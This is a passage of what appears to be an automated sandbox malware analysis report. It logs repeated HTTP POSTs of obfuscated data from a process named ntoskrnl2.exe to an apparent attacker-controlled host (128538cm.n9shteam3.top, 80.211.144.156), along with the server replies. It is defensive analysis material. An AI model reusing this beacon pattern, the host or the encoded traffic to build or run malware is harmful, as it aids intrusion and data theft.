                                                            Data Ascii: UU_Q^@\W[_VZW^P\U]^EP\ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'X3!9_?320=*Y(=8-74Y3<)U((<U>(X=1":*%^./]+$
                                                            Sep 2, 2024 13:34:25.302304983 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:25.433855057 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:24 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            46192.168.2.64979380.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:26.490762949 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:26.837310076 CEST1028OUTData Raw: 50 55 5f 51 5b 45 5c 51 5b 5f 56 5a 57 5f 50 59 55 5e 5e 42 50 53 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PU_Q[E\Q[_VZW_PYU^^BPSZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'^&1.(+<'5^$&<-8'4[3,V(8)$)25:%^./]+
                                                            Sep 2, 2024 13:34:27.134881020 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:27.348201990 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:26 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            47192.168.2.64979480.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:27.498933077 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:27.853112936 CEST1028OUTData Raw: 50 55 5a 5f 5e 42 59 55 5b 5f 56 5a 57 54 50 52 55 59 5e 47 50 5d 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PUZ_^BYU[_VZWTPRUY^GP]ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'9_?8'01:'(>#/7'<:?(()$3?2&_9:%^./]+
                                                            Sep 2, 2024 13:34:28.162817955 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:28.364295006 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            48192.168.2.64979580.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:28.586710930 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:28.931453943 CEST1028OUTData Raw: 50 55 5a 52 5e 46 5c 54 5b 5f 56 5a 57 5c 50 5a 55 5f 5e 46 50 5e 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PUZR^F\T[_VZW\PZU_^FP^ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'[319<8'^3%=-?\;$''/=S(; V*4Z="5.%^./]+,
                                                            Sep 2, 2024 13:34:29.239969015 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:29.367033005 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            49192.168.2.64979680.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:29.502262115 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:29.855134010 CEST1028OUTData Raw: 50 53 5a 51 5e 44 59 54 5b 5f 56 5a 57 58 50 5d 55 5f 5e 48 50 5c 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZQ^DYT[_VZWXP]U_^HP\ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3=\+#06'.&?=7-'+3<T<^8U*3=!9-%^./]+<
                                                            Sep 2, 2024 13:34:30.156847000 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:30.283543110 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            50192.168.2.64979780.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:29.545577049 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:29.899835110 CEST1340OUTData Raw: 50 55 5a 50 5b 42 5c 53 5b 5f 56 5a 57 5b 50 5c 55 58 5e 43 50 5d 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PUZP[B\S[_VZW[P\UX^CP]Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$!1\(+^0"$-6]>-;; 3?6*;0)8Y?1.:%^./]+0
                                                            Sep 2, 2024 13:34:30.211570024 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:30.441332102 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 54 34 27 27 57 25 02 2c 1d 2a 00 26 12 28 3d 05 1d 2d 01 20 1f 27 39 09 59 3f 0c 0b 18 25 39 25 13 2b 3c 08 05 2b 31 25 53 22 24 20 5b 03 1f 26 03 34 54 36 13 25 3b 3d 5b 27 34 31 07 20 24 2f 07 3e 3e 2e 18 24 13 16 58 23 22 3a 51 2f 5b 39 0b 31 3b 3b 03 3a 02 31 07 32 3e 2a 56 08 16 38 55 3f 3c 29 04 20 24 28 02 34 38 2a 0b 23 18 24 08 27 0d 2f 54 27 2a 04 0a 25 2e 33 57 29 5b 23 5c 24 00 21 5d 23 1d 07 1b 2d 39 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: T4''W%,*&(=- '9Y?%9%+<+1%S"$ [&4T6%;=['41 $/>>.$X#":Q/[91;;:12>*V8U?<) $(48*#$'/T'*%.3W)[#\$!]#-9$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            51192.168.2.64979880.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:30.438664913 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:30.790513039 CEST1028OUTData Raw: 50 51 5a 55 5b 45 59 50 5b 5f 56 5a 57 54 50 5b 55 5a 5e 40 50 5c 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQZU[EYP[_VZWTP[UZ^@P\Z\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y3!Y(4'63:]>-$,$3W*+/*B')-.%^./]+
                                                            Sep 2, 2024 13:34:31.112586975 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:31.246515036 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:30 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            52192.168.2.64979980.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:31.387963057 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:31.743793011 CEST1028OUTData Raw: 55 5f 5a 53 5b 43 5c 50 5b 5f 56 5a 57 58 50 58 55 5a 5e 46 50 5c 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U_ZS[C\P[_VZWXPXUZ^FP\ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'X&2.<+(32$>:X? ]-78\&?%T(/)(_?!6.%^./]+<
                                                            Sep 2, 2024 13:34:32.035018921 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:32.165390015 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:31 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            53192.168.2.64980080.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:32.333511114 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:32.681128025 CEST1028OUTData Raw: 55 54 5a 52 5e 41 59 52 5b 5f 56 5a 57 54 50 5a 55 58 5e 41 50 5b 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZR^AYR[_VZWTPZUX^AP[ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3!2(?02:$>:(/?3?&?(<P)[>">].*%^./]+
                                                            Sep 2, 2024 13:34:32.997924089 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:33.122889042 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            54192.168.2.64980180.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:33.246026039 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:33.606214046 CEST1028OUTData Raw: 55 54 5a 55 5b 41 59 53 5b 5f 56 5a 57 5f 50 52 55 5f 5e 43 50 58 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZU[AYS[_VZW_PRU_^CPXZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z$!&<80^$.6^?. 87($9S<0T*B'>W"Y-:%^./]+
                                                            Sep 2, 2024 13:34:33.901288033 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:34.055578947 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            55192.168.2.64980280.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:34.192039967 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:34.540631056 CEST1024OUTData Raw: 50 51 5a 52 5e 43 5c 50 5b 5f 56 5a 57 5d 50 53 55 50 5e 44 50 5a 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQZR^C\P[_VZW]PSUP^DPZZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'^3!Y+;3!_$-6<-?,$]3/)?8*4#=5.%^./]+
                                                            Sep 2, 2024 13:34:34.847290039 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:35.909945011 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:34 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:34:35.910060883 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:34 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:34:35.911027908 CEST183INHTTP/1.1 100 Continue
                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 30 32 20 53 65 70 20 32 30 32 34 20 31 31 3a 33 34 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 31 56 59 5a
                                                            Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Mon, 02 Sep 2024 11:34:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive1VYZ
                                                            Sep 2, 2024 13:34:36.117063046 CEST183INHTTP/1.1 100 Continue
                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 30 32 20 53 65 70 20 32 30 32 34 20 31 31 3a 33 34 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 31 56 59 5a
                                                            Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Mon, 02 Sep 2024 11:34:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            56192.168.2.64980380.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:36.117806911 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1324
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:36.462373972 CEST1324OUTData Raw: 55 54 5a 51 5b 45 59 53 5b 5f 56 5a 57 5d 50 58 55 5b 5e 43 50 5c 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZQ[EYS[_VZW]PXU[^CP\Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&!:=88'%X$-.Y>-8Z; Y3*<80W)()W=.*%^./]+
                                                            Sep 2, 2024 13:34:36.764698982 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:36.889368057 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:36 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 53 34 0a 02 0f 31 15 09 02 3d 07 04 58 28 13 28 44 2e 59 24 58 33 07 0e 02 28 1c 2e 0b 25 39 3d 5c 3e 02 29 5a 3f 0c 00 0d 22 24 20 5b 03 1f 26 04 34 0c 0f 09 25 5e 31 1f 27 0e 22 58 35 34 2f 06 28 3e 36 52 33 3e 3f 00 21 31 2e 55 38 04 3e 57 31 3b 2b 06 39 3f 3e 58 31 04 2a 56 08 16 3b 0e 3f 3c 3a 15 37 27 3f 1f 37 5e 26 0d 37 25 27 52 24 30 37 1e 27 5c 32 0f 27 2e 06 0f 3d 2d 34 01 30 00 39 14 21 23 21 52 2c 29 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: S41=X((D.Y$X3(.%9=\>)Z?"$ [&4%^1'"X54/(>6R3>?!1.U8>W1;+9?>X1*V;?<:7'?7^&7%'R$07'\2'.=-409!#!R,)$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            57192.168.2.64980480.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:36.119716883 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:36.477982044 CEST1028OUTData Raw: 50 53 5a 54 5e 44 5c 50 5b 5f 56 5a 57 5c 50 5f 55 5b 5e 43 50 5d 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZT^D\P[_VZW\P_U[^CP]Z_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&1!X(+#39^3>9<;; Z$<:++;=(Z)6:*%^./]+,
                                                            Sep 2, 2024 13:34:36.783283949 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:36.909029961 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:36 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            58192.168.2.64980580.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:37.046052933 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
